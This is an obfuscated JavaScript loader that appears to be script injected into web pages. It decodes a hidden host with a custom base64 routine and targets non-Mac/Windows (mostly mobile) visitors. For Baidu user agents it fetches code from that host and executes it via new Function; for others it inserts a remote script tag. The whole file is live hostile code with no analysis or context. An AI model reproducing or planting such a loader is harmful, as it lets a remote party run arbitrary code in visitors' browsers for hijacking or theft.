function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};